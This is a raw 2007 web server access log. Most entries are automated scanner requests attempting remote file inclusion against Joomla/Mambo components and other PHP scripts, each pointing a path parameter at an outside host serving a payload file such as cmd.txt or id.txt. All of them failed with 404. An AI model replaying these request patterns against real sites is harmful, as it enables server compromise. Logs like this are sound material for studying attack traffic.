87.118.100.132 - - [29/Oct/2007:13:09:48 -0700] "GET /index2.php?url_page=http://www.childrenshealthservices.net/media/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "galf.org"
87.118.100.132 - - [29/Oct/2007:13:10:43 -0700] "GET /logs/access_070723.log/index2.php?url_page=http://www.childrenshealthservices.net/media/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.118.100.132 - - [29/Oct/2007:13:10:43 -0700] "GET /logs/access_071015.log/index2.php?url_page=http://www.childrenshealthservices.net/media/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
203.151.232.105 - - [29/Oct/2007:13:10:46 -0700] "GET /logs/access_071008.log/akocomments.php?mosConfig_absolute_path=http://201.37.71.117:8090/cmdimbox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
212.35.74.206 - - [29/Oct/2007:13:11:04 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.8) Gecko/20071008 Firefox/2.0.0.8" "www.galf.org"
70.86.234.242 - - [29/Oct/2007:13:11:52 -0700] "GET /logs/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://ianshell.com/stopcook/images/ec.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
70.86.234.242 - - [29/Oct/2007:13:11:53 -0700] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://ianshell.com/stopcook/images/ec.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
212.35.74.206 - - [29/Oct/2007:13:12:45 -0700] "GET /logs/access_070723.log HTTP/1.1" 200 1448192 "http://www.google.com/search?q=77.232.68.201&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.8) Gecko/20071008 Firefox/2.0.0.8" "www.galf.org"
217.172.33.99 - - [29/Oct/2007:13:13:05 -0700] "GET /logs/access.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
217.172.33.99 - - [29/Oct/2007:13:13:05 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
217.172.33.99 - - [29/Oct/2007:13:13:06 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
205.234.187.222 - - [29/Oct/2007:13:13:30 -0700] "GET /logs/index.php?p=http://208.187.161.74/images/2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
205.234.187.222 - - [29/Oct/2007:13:13:30 -0700] "GET /index.php?p=http://208.187.161.74/images/2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
91.142.210.125 - - [29/Oct/2007:13:13:41 -0700] "GET /logs/oneadmin/calendar/samplecalendar.php?path[docroot]=http://www.muslimphuket.org//modules/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
91.142.210.125 - - [29/Oct/2007:13:13:41 -0700] "GET /logs/oneadmin/newspublish//include.php?path[docroot]=http://www.muslimphuket.org//modules/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
91.142.210.125 - - [29/Oct/2007:13:13:41 -0700] "GET /oneadmin/calendar/samplecalendar.php?path[docroot]=http://www.muslimphuket.org//modules/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
91.142.210.125 - - [29/Oct/2007:13:13:41 -0700] "GET /oneadmin/newspublish//include.php?path[docroot]=http://www.muslimphuket.org//modules/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.106.128.100 - - [29/Oct/2007:13:15:25 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.106.128.100 - - [29/Oct/2007:13:15:25 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
72.36.115.58 - - [29/Oct/2007:13:16:02 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "CazoodleBot/CazoodleBot-0.1 (CazoodleBot Crawler; http://www.cazoodle.com/cazoodlebot; cazoodlebot@cazoodle.com)" "www.galf.org"
69.93.203.42 - - [29/Oct/2007:13:16:02 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.36.115.58 - - [29/Oct/2007:13:16:02 -0700] "GET /logs/access_070618.log HTTP/1.0" 200 262144 "-" "CazoodleBot/CazoodleBot-0.1 (CazoodleBot Crawler; http://www.cazoodle.com/cazoodlebot; cazoodlebot@cazoodle.com)" "www.galf.org"
217.172.33.99 - - [29/Oct/2007:13:16:05 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
217.172.33.99 - - [29/Oct/2007:13:16:05 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
80.58.205.45 - - [29/Oct/2007:13:16:16 -0700] "GET /logs/index2.php?x=ftp://80.50.253.90/upload/071011004039p/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
80.58.205.45 - - [29/Oct/2007:13:16:17 -0700] "GET /logs/index2.php?x=ftp://ftp.metaltrade.ru/incoming/%FF%FF%FF%FF%FF%FFo%FF%FF%FF%FF%FF%FF/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
80.58.205.45 - - [29/Oct/2007:13:16:18 -0700] "GET /index2.php?x=ftp://80.50.253.90/upload/071011004039p/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
80.58.205.45 - - [29/Oct/2007:13:16:20 -0700] "GET /index2.php?x=ftp://ftp.metaltrade.ru/incoming/%FF%FF%FF%FF%FF%FFo%FF%FF%FF%FF%FF%FF/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
203.146.249.74 - - [29/Oct/2007:13:16:29 -0700] "GET /!scanhttp://br.geocities.com/ricardomariano_2000/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
203.146.249.74 - - [29/Oct/2007:13:16:30 -0700] "GET /logs/!scanhttp://br.geocities.com/ricardomariano_2000/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
203.146.249.74 - - [29/Oct/2007:13:16:30 -0700] "GET /!scanhttp://br.geocities.com/ricardomariano_2000/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
204.14.110.100 - - [29/Oct/2007:13:17:45 -0700] "GET /view.php?table=http://freewebs.com/lamercrew/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
216.127.72.15 - - [29/Oct/2007:13:18:02 -0700] "GET /logs/access_071001.log/components/com_facileforms/facileforms.frame.php?ff_compath=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
216.127.72.15 - - [29/Oct/2007:13:18:02 -0700] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
216.127.72.15 - - [29/Oct/2007:13:18:03 -0700] "GET /logs/components/com_facileforms/facileforms.frame.php?ff_compath=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
217.172.33.99 - - [29/Oct/2007:13:18:38 -0700] "GET /logs/access_071001.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
204.246.140.12 - - [29/Oct/2007:13:19:13 -0700] "GET /logs//components/com_flyspray/startdown.php?file=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
204.246.140.12 - - [29/Oct/2007:13:19:13 -0700] "GET //components/com_flyspray/startdown.php?file=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
207.44.188.10 - - [29/Oct/2007:13:19:57 -0700] "GET /logs//components/com_flyspray/startdown.php?file=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
207.44.188.10 - - [29/Oct/2007:13:19:57 -0700] "GET //components/com_flyspray/startdown.php?file=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
201.122.11.226 - - [29/Oct/2007:13:20:48 -0700] "GET /submissions.php/public/amministrazione/newspublish//include.php?path%5Bdocroot%5D=http://infected1249.iespana.es/asc.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
201.122.11.226 - - [29/Oct/2007:13:21:00 -0700] "GET /logs/submissions.php/public/amministrazione/newspublish//include.php?path%5Bdocroot%5D=http://infected1249.iespana.es/asc.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "galf.org"
205.234.187.222 - - [29/Oct/2007:13:21:51 -0700] "GET /logs/index.php?paghttp://208.187.161.74/images/2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
205.234.187.222 - - [29/Oct/2007:13:21:51 -0700] "GET /index.php?paghttp://208.187.161.74/images/2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
220.130.3.67 - - [29/Oct/2007:13:21:56 -0700] "GET /logs/access_070716.log//modules/agendax/addevent.inc.php?agendax_path=http://www.khabox.net/images/config.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
220.130.3.67 - - [29/Oct/2007:13:21:57 -0700] "GET //modules/agendax/addevent.inc.php?agendax_path=http://www.khabox.net/images/config.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
220.130.3.67 - - [29/Oct/2007:13:21:58 -0700] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://www.khabox.net/images/config.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
200.202.236.2 - - [29/Oct/2007:13:22:37 -0700] "GET /logs/access_071008.log//skin/zero_vote/error.php?dir=http://www.spices.res.in/biotraineeship.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.202.236.2 - - [29/Oct/2007:13:22:37 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.spices.res.in/biotraineeship.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
205.234.187.222 - - [29/Oct/2007:13:22:39 -0700] "GET /logs/index.php?pag=http://208.187.161.74/images/2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
205.234.187.222 - - [29/Oct/2007:13:22:39 -0700] "GET /index.php?pag=http://208.187.161.74/images/2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
87.106.128.100 - - [29/Oct/2007:13:22:51 -0700] "GET /logs//components/com_flyspray/startdown.php?file=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
87.106.128.100 - - [29/Oct/2007:13:22:52 -0700] "GET //components/com_flyspray/startdown.php?file=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
200.202.236.2 - - [29/Oct/2007:13:23:02 -0700] "GET /logs/access_071001.log//skin/zero_vote/error.php?dir=http://www.spices.res.in/biotraineeship.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.55.133.70 - - [29/Oct/2007:13:23:21 -0700] "GET /logs//components/com_flyspray/startdown.php?file=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
72.55.133.70 - - [29/Oct/2007:13:23:21 -0700] "GET //components/com_flyspray/startdown.php?file=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
217.172.33.99 - - [29/Oct/2007:13:23:29 -0700] "GET /logs//components/com_flyspray/startdown.php?file=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
217.172.33.99 - - [29/Oct/2007:13:23:29 -0700] "GET //components/com_flyspray/startdown.php?file=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
87.230.10.251 - - [29/Oct/2007:13:23:36 -0700] "GET /logs//components/com_flyspray/startdown.php?file=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.230.10.251 - - [29/Oct/2007:13:23:37 -0700] "GET //components/com_flyspray/startdown.php?file=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.230.33.217 - - [29/Oct/2007:13:23:38 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://201.37.71.117:8090/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.230.33.217 - - [29/Oct/2007:13:23:39 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://201.37.71.117:8090/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
216.127.72.15 - - [29/Oct/2007:13:24:02 -0700] "GET /logs//components/com_flyspray/startdown.php?file=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
216.127.72.15 - - [29/Oct/2007:13:24:02 -0700] "GET //components/com_flyspray/startdown.php?file=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
72.29.73.171 - - [29/Oct/2007:13:24:49 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://zamkad.ru/pub/buffer_upload/.../cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.29.73.171 - - [29/Oct/2007:13:24:49 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://zamkad.ru/pub/buffer_upload/.../cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.115.183.162 - - [29/Oct/2007:13:24:58 -0700] "GET /logs//components/com_flyspray/startdown.php?file=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
209.115.183.162 - - [29/Oct/2007:13:24:58 -0700] "GET //components/com_flyspray/startdown.php?file=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
220.130.3.67 - - [29/Oct/2007:13:25:21 -0700] "GET /logs/access_070604.log//modules/agendax/addevent.inc.php?agendax_path=http://www.khabox.net/images/config.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
201.122.11.226 - - [29/Oct/2007:13:25:44 -0700] "GET /logs/century/raid/announcements.php?phpraid_dir=http://infected1249.iespana.es/asc.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
201.122.11.226 - - [29/Oct/2007:13:25:45 -0700] "GET /century/raid/announcements.php?phpraid_dir=http://infected1249.iespana.es/asc.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
201.122.11.226 - - [29/Oct/2007:13:26:45 -0700] "GET /logs/century/raid/announcements.php?phpraid_dir=http://infected1249.iespana.es/asc.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "galf.org"
201.122.11.226 - - [29/Oct/2007:13:26:53 -0700] "GET /century/raid/announcements.php?phpraid_dir=http://infected1249.iespana.es/asc.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "galf.org"
87.106.128.100 - - [29/Oct/2007:13:27:17 -0700] "GET /logs//administrator/components/com_serverstat/inst.serverstat.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.106.128.100 - - [29/Oct/2007:13:27:17 -0700] "GET //administrator/components/com_serverstat/inst.serverstat.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
72.29.73.171 - - [29/Oct/2007:13:27:27 -0700] "GET /administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://zamkad.ru/pub/buffer_upload/.../cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.29.73.171 - - [29/Oct/2007:13:27:28 -0700] "GET /administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://zamkad.ru/pub/buffer_upload/.../cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
217.172.33.99 - - [29/Oct/2007:13:28:15 -0700] "GET /logs//administrator/components/com_serverstat/inst.serverstat.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
217.172.33.99 - - [29/Oct/2007:13:28:15 -0700] "GET //administrator/components/com_serverstat/inst.serverstat.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
194.117.241.22 - - [29/Oct/2007:13:29:18 -0700] "GET /logs/access_070917.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://dupa123.000webhost.info/z/ver3? HTTP/1.0" 404 275 "-" "libwww-perl/5.51" "www.galf.org"
194.117.241.22 - - [29/Oct/2007:13:29:18 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://dupa123.000webhost.info/z/ver3? HTTP/1.0" 404 275 "-" "libwww-perl/5.51" "www.galf.org"
194.117.241.22 - - [29/Oct/2007:13:29:19 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://dupa123.000webhost.info/z/ver3? HTTP/1.0" 404 275 "-" "libwww-perl/5.51" "www.galf.org"
68.180.250.70 - - [29/Oct/2007:13:29:22 -0700] "GET /logs/access_071001.log HTTP/1.0" 200 589824 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
202.174.85.9 - - [29/Oct/2007:13:31:52 -0700] "GET /logs//components/com_flyspray/startdown.php?file=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
202.174.85.9 - - [29/Oct/2007:13:31:52 -0700] "GET //components/com_flyspray/startdown.php?file=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
194.117.241.22 - - [29/Oct/2007:13:33:04 -0700] "GET /logs/access_070806.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://dupa123.000webhost.info/z/ver3? HTTP/1.0" 404 275 "-" "libwww-perl/5.51" "www.galf.org"
204.213.246.61 - - [29/Oct/2007:13:33:25 -0700] "GET //components/com_flyspray/startdown.php?file=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
65.98.57.98 - - [29/Oct/2007:13:35:48 -0700] "GET /logs/access.log/components/com_facileforms/facileforms.frame.php?ff_compath=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
65.98.57.98 - - [29/Oct/2007:13:35:49 -0700] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
65.98.57.98 - - [29/Oct/2007:13:35:50 -0700] "GET /logs/components/com_facileforms/facileforms.frame.php?ff_compath=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
201.122.11.226 - - [29/Oct/2007:13:37:25 -0700] "GET /logs/century/raid/announcements.php?phpraid_dir=http://infected1249.iespana.es/asc.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
201.122.11.226 - - [29/Oct/2007:13:37:30 -0700] "GET /century/raid/announcements.php?phpraid_dir=http://infected1249.iespana.es/asc.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
201.122.11.226 - - [29/Oct/2007:13:37:32 -0700] "GET /logs/century/raid/announcements.php?phpraid_dir=http://infected1249.iespana.es/asc.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
83.141.132.21 - - [29/Oct/2007:13:37:44 -0700] "GET //include.php?path[docroot]=http://www.mursia.net/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
72.30.214.232 - - [29/Oct/2007:13:38:17 -0700] "GET / HTTP/1.0" 200 1032 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
87.118.100.132 - - [29/Oct/2007:13:39:08 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.childrenshealthservices.net/media/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.118.100.132 - - [29/Oct/2007:13:39:09 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.childrenshealthservices.net/media/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
82.215.5.180 - - [29/Oct/2007:13:39:54 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.woman.fromland.net//language/lang_german/r8.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
82.215.5.180 - - [29/Oct/2007:13:39:54 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.woman.fromland.net//language/lang_german/r8.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
84.19.176.145 - - [29/Oct/2007:13:40:15 -0700] "GET /logs/access_070826.log//include.php?path[docroot]=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.NoRTeK/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
84.19.176.145 - - [29/Oct/2007:13:40:17 -0700] "GET //include.php?path[docroot]=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.NoRTeK/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
84.19.176.145 - - [29/Oct/2007:13:40:17 -0700] "GET /logs//include.php?path[docroot]=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.NoRTeK/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
205.234.187.222 - - [29/Oct/2007:13:40:53 -0700] "GET /logs/index.php?id=1&lang=http://208.187.161.74/images/2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
205.234.187.222 - - [29/Oct/2007:13:40:53 -0700] "GET /index.php?id=1&lang=http://208.187.161.74/images/2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
84.19.176.145 - - [29/Oct/2007:13:41:21 -0700] "GET /logs/access_070924.log//include.php?path[docroot]=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.NoRTeK/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
69.93.209.250 - - [29/Oct/2007:13:41:38 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.reachne.org//components/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
69.93.209.250 - - [29/Oct/2007:13:41:38 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.reachne.org//components/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
86.120.49.2 - - [29/Oct/2007:13:42:49 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.29.73.171 - - [29/Oct/2007:13:43:32 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://zamkad.ru/pub/buffer_upload/.../cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
72.29.73.171 - - [29/Oct/2007:13:43:32 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://zamkad.ru/pub/buffer_upload/.../cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.29.73.171 - - [29/Oct/2007:13:43:33 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://zamkad.ru/pub/buffer_upload/.../cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.29.73.171 - - [29/Oct/2007:13:43:33 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://zamkad.ru/pub/buffer_upload/.../cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
87.118.100.132 - - [29/Oct/2007:13:43:57 -0700] "GET /logs/access_070903.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.childrenshealthservices.net/media/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
202.174.85.9 - - [29/Oct/2007:13:45:13 -0700] "GET /logs//administrator/components/com_serverstat/inst.serverstat.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.76"
202.174.85.9 - - [29/Oct/2007:13:45:14 -0700] "GET //administrator/components/com_serverstat/inst.serverstat.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
190.70.107.144 - - [29/Oct/2007:13:45:29 -0700] "GET /logs/access_070723.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.eldesbande.com/hi5/date.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
190.70.107.144 - - [29/Oct/2007:13:45:29 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.eldesbande.com/hi5/date.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
190.70.107.144 - - [29/Oct/2007:13:45:29 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.eldesbande.com/hi5/date.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
81.93.240.191 - - [29/Oct/2007:13:45:30 -0700] "GET /logs/mosConfig_absolute_path=http://spyd0x.olympe-network.com/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.galf.org"
81.93.240.191 - - [29/Oct/2007:13:45:30 -0700] "GET /mosConfig_absolute_path=http://spyd0x.olympe-network.com/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.galf.org"
65.98.57.98 - - [29/Oct/2007:13:45:45 -0700] "GET /logs//components/com_flyspray/startdown.php?file=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
65.98.57.98 - - [29/Oct/2007:13:45:46 -0700] "GET //components/com_flyspray/startdown.php?file=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
202.157.188.77 - - [29/Oct/2007:13:46:16 -0700] "GET /modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://infected1249.iespana.es/asc.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
201.122.11.226 - - [29/Oct/2007:13:46:48 -0700] "GET /logs/component/option,com_comprofiler/task,userProfile/Itemid,127/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://infected1249.iespana.es/asc.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
201.122.11.226 - - [29/Oct/2007:13:46:49 -0700] "GET /component/option,com_comprofiler/task,userProfile/Itemid,127/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://infected1249.iespana.es/asc.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
